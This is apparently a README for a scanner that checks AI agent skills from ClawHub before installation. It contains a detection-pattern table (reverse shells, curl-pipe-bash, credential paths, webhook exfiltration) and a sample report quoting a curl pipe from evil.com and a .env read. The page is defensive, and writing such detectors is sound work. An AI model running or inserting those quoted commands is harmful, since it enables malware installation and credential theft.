clawhub-skill-scanner

Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.
Install via ClawdBot CLI:

```bash
clawdbot install amir-ag/clawhub-skill-scanner
```

MANDATORY security check before installing external skills.
Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.
Run this audit BEFORE any `clawhub install`:

```bash
# Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill

# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json

# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe
```
| Category | Patterns |
|----------|----------|
| Reverse Shells | nc -e, bash /dev/tcp, Python socket shells |
| Curl-Pipe-Bash | curl \| bash, wget && chmod +x |
| Credential Access | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
| Data Exfiltration | Discord/Slack webhooks, POST with secrets |
| Malicious Domains | glot.io, pastebin (known malware hosts) |
| Persistence | crontab, systemd, LaunchAgents, .bashrc |
| Command Injection | eval(), exec(), subprocess shell=True |
| Obfuscation | base64 decode pipes, pickle, marshal |
The scanner flags only patterns that are suspicious regardless of skill type. We intentionally don't warn on common patterns that legitimate skills also use. This reduces noise so real threats stand out.
CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution
| Score | Level | Action |
|-------|-------|--------|
| 0-20 | 🟢 SAFE | Auto-approve |
| 21-50 | 🟡 CAUTION | Review findings |
| 51-80 | 🟠 DANGER | Detailed review required |
| 81-100 | 🔴 BLOCKED | Do NOT install |
```text
════════════════════════════════════════════════════════════
SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════
RISK SCORE: 90/100 - 🔴 BLOCKED

🔴 CRITICAL FINDINGS (3)
  [install.py:15] Curl pipe to shell (DANGEROUS!)
    Code: os.system('curl https://evil.com/x.sh | bash')
  [setup.py:42] Discord webhook exfiltration
    Code: requests.post('https://discord.com/api/webhooks/...')
  [run.py:8] ClawdBot .env access (ClawHavoc target!)
    Code: open(os.path.expanduser('~/.clawdbot/.env'))

FILES SCANNED: 5
TOTAL LINES: 230
════════════════════════════════════════════════════════════
🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════
```
Create a wrapper script to auto-scan before installation:

```bash
#!/bin/bash
# clawhub-secure: Scan before install
# Usage: clawhub-secure install <skill>  (the skill name is the second argument)
set -u
SKILL="$2"
# Fresh, unpredictable scratch directory (a fixed /tmp name would be guessable)
TEMP="$(mktemp -d /tmp/skill-audit-XXXXXX)"
# Always remove the scratch copy, whether the scan passes or fails
trap 'rm -rf "$TEMP"' EXIT

# Fetch without installing; an empty scratch dir would scan as SAFE, so abort on failure
clawhub inspect "$SKILL" --out "$TEMP" || { echo "Could not fetch $SKILL"; exit 1; }

# Scan: the scanner exits 0 only if the skill is SAFE
if python3 /path/to/scan_skill.py "$TEMP" --install-if-safe; then
    clawhub install "$SKILL"
else
    echo "🔴 Installation blocked by security scan"
    exit 1
fi
```
See references/threat-patterns.md for detailed pattern explanations.
Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated
large-scale supply chain attacks via AI agent skill marketplaces.
Generated Mar 1, 2026
Large organizations deploying AI agents across departments need to ensure third-party skills from marketplaces like ClawHub are secure before installation. This scanner prevents supply chain attacks by detecting malicious code, such as credential theft or reverse shells, which could compromise sensitive corporate data and systems. It integrates into CI/CD pipelines to automate security checks during skill procurement.
Healthcare providers using AI agents for patient data analysis or administrative tasks must comply with regulations like HIPAA. This scanner audits skills for data exfiltration patterns, such as unauthorized webhook calls, ensuring no patient information is leaked. It helps maintain compliance by blocking skills with critical security risks before they access protected health information.
E-commerce platforms leveraging AI agents for customer service or inventory management rely on external skills to enhance functionality. This scanner checks for command injection or malicious domains in skills to prevent disruptions like data breaches or system takeovers. It ensures automated processes remain secure and operational without exposing customer payment details.
Educational institutions developing AI-powered tutoring or research tools often incorporate skills from open-source repositories. This scanner identifies obfuscated code or persistence mechanisms that could lead to unauthorized access in student or faculty systems. It safeguards academic data by enforcing mandatory security audits before skill integration into learning platforms.
Startups building AI-driven products quickly integrate third-party skills to accelerate development. This scanner detects critical threats like curl-pipe-bash commands that could install malware, protecting intellectual property and user trust. It allows startups to innovate safely by automating security reviews during rapid prototyping and deployment phases.
Offer a basic version for free to individual developers or small teams, with limited scans per month. Charge for premium features like advanced threat detection, API access, and integration with CI/CD tools. Revenue comes from subscription tiers, targeting enterprises needing scalable security for large skill deployments.
Sell annual licenses to large corporations for unlimited scans, custom rule sets, and dedicated support. Include features like compliance reporting and integration with existing security infrastructure. Revenue is generated through direct sales and tailored contracts, focusing on industries with high security requirements like finance and healthcare.
Partner with AI skill marketplaces like ClawHub to embed the scanner as a mandatory pre-installation check. Charge a fee per scan or a revenue share from skill transactions. This model drives adoption by making security a default feature, benefiting from the marketplace's user base and transaction volume.
💬 Integration Tip
Integrate the scanner into your CI/CD pipeline using the --json flag for automated reporting, and use the --install-if-safe option to block risky installations automatically.